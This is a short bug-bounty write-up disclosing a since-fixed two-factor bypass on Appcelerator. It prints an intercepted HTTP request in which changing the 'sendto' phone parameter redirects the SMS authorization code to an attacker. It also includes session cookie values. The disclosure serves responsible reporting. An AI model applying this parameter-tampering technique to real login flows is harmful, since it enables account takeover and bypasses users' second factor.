2 Factor Authentication Bypass on Appcelerator

Akash c
2 min readOct 13, 2017

Weakness:Web Parameter Tampering

Two Factor Authentication, also known as 2FA is an extra layer of security that is known as “multi factor authentication” that requires not only a password and username but also something that only, and only, that user has on them,Using a Two Factor Authentication process can help to lower the number of cases of identity theft on the Internet, as well as phishing via email, because the criminal would need more than just the users name and password details.

If 2FA is enabled in Appcelerator account we need to verify device authorization code after logged in, using email address and password in order to access that account, the authorization code can be received from either registered email address or phone number

After logged into my account, I selected SMS option to receive authorization code and intercepted the request using Burp Proxy


POST /api/v1/auth/deviceauth/resend?_=1468379493167 HTTP/1.1  Host:platform.appcelerator.com 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: application/json; charset=utf- 8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With:XMLHttpRequest
Referer: https://platform.appcelerator.com/ Content-Length: 89 Cookie:connect.sid=s%3AuaT30j6RosUYLUwCMIFsW10jzxIDLRN8.mVIeYgdbfu8PhbkILdy07yWEAiZZ4GUv4%2B5qpo%2BpaRQ;aid=653cf33a8dbd00dbc2c431935fc281a8c80b3baa3642dcca;aidsid=76c8766c427b466a7bd110a391e64a684ce74192; _ga=GA1.2.1540821944.1468379453; _gat=1; dvid=5e5bafae-b83e-41c1-9c2f-d154b24d8e69
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
user_guid=0f402223-54a8-4b66-91b4- 300af56d9c46&from=web&sendby=sms&sendto=%2B919061100000

The parameter “sendto” is vulnerable to Web Parameter Tampering Attack that means we can change the phone number in that request and the authorization code will send to that number hence attacker will get the authorization code

After reporting this issue, Appcelerator resolved the vulnerability and listed my name on their Hall Of Fame page